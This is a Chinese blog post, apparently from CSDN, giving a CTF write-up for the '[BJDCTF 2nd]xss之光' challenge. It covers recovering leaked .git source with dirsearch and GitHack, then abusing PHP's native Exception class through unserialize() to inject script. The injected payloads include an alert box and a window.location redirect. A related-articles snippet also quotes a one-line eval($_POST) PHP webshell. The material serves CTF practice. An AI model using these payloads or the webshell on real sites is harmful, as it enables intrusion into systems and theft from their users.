2020/7/20 -[BJDCTF 2nd]xss之光 - git源码泄露、php原生类反序列化

最新推荐文章于 2023-07-26 17:11:01 发布
最新推荐文章于 2023-07-26 17:11:01 发布
阅读量585 收藏 2
点赞数 2
分类专栏: CTF 文章标签: buuoj之web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zhangxiansheng12/article/details/107460997
版权

又回来了,当初看不懂,现在看起来也很nb(Exception类没了解过)

首先是个git源码泄露,开始用dirsearch扫的时候很快,但全是429,后来用了-s 延迟(单位:s)选项成功扫出.git泄露。
在这里插入图片描述
亲自实验-s 0.5也可以,稍微快了点。用githack下载源码,index.php
在这里插入图片描述
内容如下所示

<?php
$a = $_GET['yds_is_so_beautiful'];
echo unserialize($a);

说他是反序列化吧,我没见过这种形式的,也不太清楚;说他不是反序列化吧,他有个unserialize函数,糟了是不会的感觉,看wp知道还有这种反序列化。反序列化还能做xss弹窗,下面是弹窗payload的来源

<?php
$a = new Exception("<script>alert(1)</script>");
echo urlencode(serialize($a));
?>

1
2
不知道flag是怎么触发的,光弹窗是没flag的,只有完成了自动跳转才会set-cookie里面就是flag,出题的原理还是不太明白

下面的payload能获得flag

<?php
$a = new Exception("<script>window.location.href='http://blog.a16ne.cn'</script>");
echo urlencode(serialize($a));
?>

在这里插入图片描述
得flag

<?php
echo urldecode("flag%7Ba7ced1fb-37c2-477e-acfd-765551d606ed%7D%0A");
?>

3

路还很长,一天起码一题

抒情诗、
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
【网络安全 | 渗透工具】Dirsearch安装使用教程详析
等风来
08-24 3万+
Dirsearch 是一个用于探测Web服务器上的隐藏目录和文件的工具。它通过发送HTTP请求来尝试访问可能存在的路径,从而找到不列在网站目录页面上的隐藏资源。Dirsearch 的主要特点包括:多线程:Dirsearch 采用多线程方式进行目录扫描,充分利用系统资源提高扫描效率。字典支持:它支持使用自定义字典文件来进行目录爆破,你可以使用自己的字典文件或使用内置的常用字典。(注:字典必须是文本文件)支持多种形式的网页(asp,php)支持HTTP代理启发式检测无效的网页。
buuctf-[GXYCTF2019]禁止套娃
qq_42728977的博客
12-24 3469
[GXYCTF2019]禁止套娃考点复现法一:单纯构造GET参数法二:构造session组合拳参考 考点 正则表达、无参数rce、git泄露 复现 法一:单纯构造GET参数 打开就一句 然后查看源码,空空如也。想到扫描后台文件,使用御剑很慢,使用dirsearch,一直429,查找资料,加了-s参数,也就是扫描不能太快。 python3 .\dirsearch.py -u http://5c0edec0-316a-4de9-999a-669f813c771b.node4.buuoj.cn:81/ -e
[0CTF 2016]piapiapia
weixin_45808483的博客
12-08 925
知识点: 信息泄露 PHP反序列化字符串逃逸(替换后导致字符串变长) 参数传递数组绕过字符串检测 题目链接 BUUCTF在线评测 1.启动环境,一个登录框 2.dirsearch扫描 先拿dirsearch扫描一遍,第一次什么也没有扫到,全部都是429。加上延时并且调一下线程再扫描一次,这一次我们扫到了压缩文件,但是普通的php文件扫不到~~。 <!--more--> 3.下载源码审计 打开config.php,我们发现了flag 继续分析源码,发现三
[极客大挑战 2019]PHP
Jay17的博客
03-02 123
[极客大挑战 2019]PHP
dirsearch的安装(非常详细)和使用
热门推荐
永不落的梦想
06-18 1万+
网站敏感目录扫描工具dirsearch的详细安装和使用
anti-xss:AntiAntiXSS | 通过PHP防止跨站点脚本(XSS
05-02
:Japanese_secret_button: 反XSS “跨站点脚本(XSS)是一种通常在Web应用程序中发现的计算机安全漏洞。XSS使攻击者能够将客户端脚本注入到其他用户查看的网页中。跨站点脚本漏洞可能被攻击者用来绕过相同原产地策略...
利用Express模拟web安全之---xss的攻与防
01-26
XSS跨站脚本攻击】是Web应用中常见的安全漏洞之一,其全称为Cross Site Scripting。由于CSS(层叠样式表)的缩写相同,因此为了区分,将其缩写为XSS。攻击者利用XSS漏洞向网页中插入恶意的JavaScript代码,当用户...
JVM参数-Xms-Xmx-Xmn-Xss-调优总结.docx
最新发布
09-13
本文主要围绕四个核心JVM参数:-Xms、-Xmx、-Xmn和-Xss进行深入讲解,并结合实际配置示例来阐述其作用和调优策略。 1. `-Xms` 和 `-Xmx`: 这两个参数用于设定JVM堆内存的最小和最大值。例如,`-Xms3550m`表示初始...
商业编程-源码-PHP文本留言本.zip
06-21
压缩包中的源码可能未包含版本控制文件(如.git),但在实际开发中,使用Git工具管理代码变更和团队协作是必需的。 8. **部署与运行**: 需要一个支持PHP的服务器环境(如Apache或Nginx搭配PHP-FPM)来运行这个...
jQuery-with-XSS 检测jQuery版本是否存在XSS漏洞
09-29
动态站点会受到一种名为“跨站脚本攻击”(Cross Site Scripting, 安全专家们通常将其缩写成XSS,原本应当是css,但为了和层叠样式表(Cascading Style Sheet,CSS )有所区分,故称XSS)的威胁,而静态站点则完全不受...
BUUCTF WEB PHP1
qq_41696858的博客
08-30 546
这题提示有备份文件,如果你直接用dirsearch扫,你会扫出来一堆429和503,因为服务器配置了防扫措施,限制了访问频率 要么手动指定扫描速度,或者你可以换个工具,dirmap,这工具本身扫的就不是非常快 扫出来www.zip,看一看,flag.php,一看就是个假flag 把项目导入到phpstorm中,然后搜索flag关键字,发现在class.php里出现了flag,而class.php是由index.php调用 所以看过代码后简单梳理一下思路 index.php <?php inc
【CTF】git源码泄露和代码审计
weixin_52450702的博客
01-19 2207
一道ctf题目中的学习:git泄露源码获取与函数绕过学习。
Dirsearch工具解析
02-01
课程声明:本课程设计目的只用于教学,帮助更多人学习安全技能 ,切勿使用课程中的技术进行违法活动,学员利用课程中的技术造成的后果与讲师本人无关,倡导维护网络安全人人有责,共同维护网络文明和谐。 课程介绍:1、Dirsearch工具介绍与安装2、Dirsearch基本使用
php反序列化漏洞(万字详解)
永不落的梦想
07-26 3672
php反序列化万字文章详解,非常全面,并结合实际案例易于理解,包括pop链、字符串逃逸、session反序列化、phar反序列化原生的利用以及各种绕过方式。
[BJDCTF 2nd]xss之光
Sk1y的博客
06-19 179
考查点:利用php原生进行xssgit文件泄露
WEB 渗透题(二)
0xac001d09
12-09 1618
[ACTF2020 新生赛]Upload–上传 验证了后缀名,要求上传 jpg、png、gif 结尾的图片,写一句话木马上传,一开始只能是图片的后缀,抓包改后缀为 phtml,文件内容如下 GFI89a <script language="php">eval($_POST['hello']) </script> 上传成功,显示 Upload Success! Look here~ ./uplo4d/fc7cad21c9c68a7847837cf3c194f78d.phtml 直接
php反序列化总结&刷题&pop链&原生
小千安全
04-22 4016
思维导图 原理 未对用户输入的序列化字符串进行检测,导致攻击者可以控制反序列化过程,一个反序列化漏洞造成要有魔术方法,恰好魔术方法里面有危险函数,比如危险函数文件读取,命令执行,反序列化在数据传递,可能触发危险函数 知识点 1、什么是反序列化操作?-格式转换 2、为什么会出现安全漏洞?-魔术方法 3、反序列化漏洞如何发现? -对象逻辑 4、反序列化漏洞如何利用?-POP链构造 补充:反序列化利用大概分 魔术方法的调用逻辑-如触发条件 语言原生的调用逻辑-如SoapClient 语言自身的安全缺陷-
深入了解PHP反序列化原生
we
06-05 1412
如果在代码审计或者ctf中,有反序列化的功能点,但是却不能构造出完整的pop链,那这时我们应该如何破局呢?我们可以尝试一下从php原生下手,php有些原生中内置一些魔术方法,如果我们巧妙构造可控参数,触发并利用其内置魔术方法,就有可能达到一些我们想要的目的。1234567891011我们采用下面脚本遍历一下所有原生中的魔术方法 Error/ExceptionError 是所有PHP内部错误的基。 (PHP 7, 8)**Error::__toString ** error 的字符串表达返回
PHP反序列化原生利用
Sentiment的博客
05-10 1703
前言 之前对反序列化原生进行过总结,但可能总结的方面不同,在ctf用到的很少,所以这里在对ctf常用原生进行一次总结。 原生 php中内置很多原生,在CTF中常以echo new $a($b);这种形式出现,当看到这种关键字眼时,就要考虑本题是不是需要原生利用了。 先看下都有什么内置原生 <?php $classes = get_declared_classes(); foreach ($classes as $class) { $methods = get_class_meth
http://xss.tesla-space.com/
07-27
XSS攻击是指攻击者向web页面的输入表单、URL或留言板等位置插入恶意JavaScript代码,以达到攻击者的目的。\[2\]根据引用\[1\]的描述,XSS攻击可以导致攻击者获取用户的cookies,从而以用户的身份进行任何操作。因此...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

抒情诗、

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值